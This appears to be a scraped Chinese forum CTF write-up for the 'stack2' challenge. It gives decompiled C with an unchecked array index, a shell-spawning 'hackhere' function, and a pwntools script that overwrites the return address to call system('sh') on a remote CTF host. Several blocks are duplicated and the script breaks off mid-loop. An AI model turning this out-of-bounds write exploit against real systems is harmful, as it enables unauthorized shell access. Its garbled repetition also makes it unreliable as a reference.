{ int v3; // eax
unsigned int len; // [esp+18h] [ebp-90h]
unsigned int choice; // [esp+1Ch] [ebp-8Ch]
int num; // [esp+20h] [ebp-88h]
unsigned int index_j; // [esp+24h] [ebp-84h]
int sum; // [esp+28h] [ebp-80h]
unsigned int index; // [esp+2Ch] [ebp-7Ch]
unsigned int index_k; // [esp+30h] [ebp-78h]
unsigned int index_i; // [esp+34h] [ebp-74h]
char nums[100]; // [esp+38h] [ebp-70h]
unsigned int v14; // [esp+9Ch] [ebp-Ch]
v14 = __readgsdword(0x14u);
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
sum = 0;
puts("***********************************************************");
puts("* An easy calc *");
puts("*Give me your numbers and I will return to you an average *");
puts("*(0 <= x < 256) *");
puts("***********************************************************");
puts("How many numbers you have:");
__isoc99_scanf("%d", &len);
puts("Give me your numbers");
for ( index = 0; index < len && index <= 99; ++index )
{
__isoc99_scanf("%d", &num);
nums[index] = num;
}
for ( index_j = len; ; printf("average is %.2lf\n", (sum / index_j)) )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
puts("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit");
__isoc99_scanf("%d", &choice);
if ( choice != 2 )
break;
puts("Give me your number");
__isoc99_scanf("%d", &num);
if ( index_j <= 99 )
{
v3 = index_j++;
nums[v3] = num;
}
}
if ( choice > 2 )
break;
if ( choice != 1 )
return 0;
puts("id\t\tnumber");
for ( index_k = 0; index_k < index_j; ++index_k )
printf("%d\t\t%d\n", index_k, nums[index_k]);
}
if ( choice != 3 )
break;
puts("which number to change:");
__isoc99_scanf("%d", &len);
puts("new number:");
__isoc99_scanf("%d", &num);
nums[len] = num; \\ dangrous
}
if ( choice != 4 )
break;
sum = 0;
for ( index_i = 0; index_i < index_j; ++index_i )
sum += nums[index_i];
}
return 0;
}int __cdecl main(int argc, const char **argv, const char **envp)
{ int v3; // eax
unsigned int len; // [esp+18h] [ebp-90h]
unsigned int choice; // [esp+1Ch] [ebp-8Ch]
int num; // [esp+20h] [ebp-88h]
unsigned int index_j; // [esp+24h] [ebp-84h]
int sum; // [esp+28h] [ebp-80h]
unsigned int index; // [esp+2Ch] [ebp-7Ch]
unsigned int index_k; // [esp+30h] [ebp-78h]
unsigned int index_i; // [esp+34h] [ebp-74h]
char nums[100]; // [esp+38h] [ebp-70h]
unsigned int v14; // [esp+9Ch] [ebp-Ch]
v14 = __readgsdword(0x14u);
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
sum = 0;
puts("***********************************************************");
puts("* An easy calc *");
puts("*Give me your numbers and I will return to you an average *");
puts("*(0 <= x < 256) *");
puts("***********************************************************");
puts("How many numbers you have:");
__isoc99_scanf("%d", &len);
puts("Give me your numbers");
for ( index = 0; index < len && index <= 99; ++index )
{
__isoc99_scanf("%d", &num);
nums[index] = num;
}
for ( index_j = len; ; printf("average is %.2lf\n", (sum / index_j)) )
{
while ( 1 )
{
while ( 1 )
{
while ( 1 )
{
puts("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit");
__isoc99_scanf("%d", &choice);
if ( choice != 2 )
break;
puts("Give me your number");
__isoc99_scanf("%d", &num);
if ( index_j <= 99 )
{
v3 = index_j++;
nums[v3] = num;
}
}
if ( choice > 2 )
break;
if ( choice != 1 )
return 0;
puts("id\t\tnumber");
for ( index_k = 0; index_k < index_j; ++index_k )
printf("%d\t\t%d\n", index_k, nums[index_k]);
}
if ( choice != 3 )
break;
puts("which number to change:");
__isoc99_scanf("%d", &len);
puts("new number:");
__isoc99_scanf("%d", &num);
nums[len] = num; \\ dangrous
}
if ( choice != 4 )
break;
sum = 0;
for ( index_i = 0; index_i < index_j; ++index_i )
sum += nums[index_i];
}
return 0;
}int hackhere()
{ return system("/bin/bash");
}int hackhere()
{ return system("/bin/bash");
}[DEBUG] Received 0x1c bytes:
'sh: 1: /bin/bash: not found\n'
sh: 1: /bin/bash: not found
[DEBUG] Received 0x1c bytes:
'sh: 1: /bin/bash: not found\n'
sh: 1: /bin/bash: not found
system('sh');
system('sh');
from pwn import *
from LibcSearcher import LibcSearcher
se=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
sa=lambda x,y:io.sendafter(x,y)
rv=lambda :io.recv()
sconnect=lambda :io.interactive()
IS_LOCAL = 0
context.log_level = "DEBUG"
pwn_file = './stack2'
elf = ELF(pwn_file)
if IS_LOCAL:
io = process(pwn_file)
else:
io = remote('111.200.241.244','63716')
#---------------------------------------------------------sa("How many numbers you have:",'1\n')
rv()sl('1')
win_addr = 0x804859B
winaddrs = [0x9B,0x85,0x04,0x08]
bin_str_addr = 0x08048987
str_addrs = [0x87,0x89,0x04,0x08]
system_plt = 0x08048450
system_plt_addrs = [0x50,0x84,0x04,0x08]
if IS_LOCAL:
gdb.attach(io,"break *0x80488EE\nc")
pause()
#set ret addr
for index in range(4):
sa('5. exit\n','3\n')
sa('which number to change:\n',str(0x84+index)+'\n')
sa('new number:\n',str(winaddrs[index])+'\n')
else:
#set ret addr
for index in range(4):
sa('5. exit\n','3\n')
sa('which number to change:\n',str(0x84+index)+'\n')
sa('new number:\n',str(system_plt_addrs[index])+'\n')
#set pointer to 'sh'
for index in range(4):
sa('5. exit\n','3\n')
sa('which number to change:\n',str(0x84+8+index)+'\n')
sa('new number:\n',str(str_addrs[index])+'\n')
rv()sl('5')
sconnect()from pwn import *
from LibcSearcher import LibcSearcher
se=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
sa=lambda x,y:io.sendafter(x,y)
rv=lambda :io.recv()
sconnect=lambda :io.interactive()
IS_LOCAL = 0
context.log_level = "DEBUG"
pwn_file = './stack2'
elf = ELF(pwn_file)
if IS_LOCAL:
io = process(pwn_file)
else:
io = remote('111.200.241.244','63716')
#---------------------------------------------------------sa("How many numbers you have:",'1\n')
rv()sl('1')
win_addr = 0x804859B
winaddrs = [0x9B,0x85,0x04,0x08]
bin_str_addr = 0x08048987
str_addrs = [0x87,0x89,0x04,0x08]
system_plt = 0x08048450
system_plt_addrs = [0x50,0x84,0x04,0x08]
if IS_LOCAL:
gdb.attach(io,"break *0x80488EE\nc")
pause()
#set ret addr
for index in range(4):
sa('5. exit\n','3\n')
sa('which number to change:\n',str(0x84+index)+'\n')
sa('new number:\n',str(winaddrs[index])+'\n')
else:
#set ret addr
for index in range(4):
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
最后于 2021-6-12 09:37
被顾言庭编辑
,原因:
|
|
|---|---|
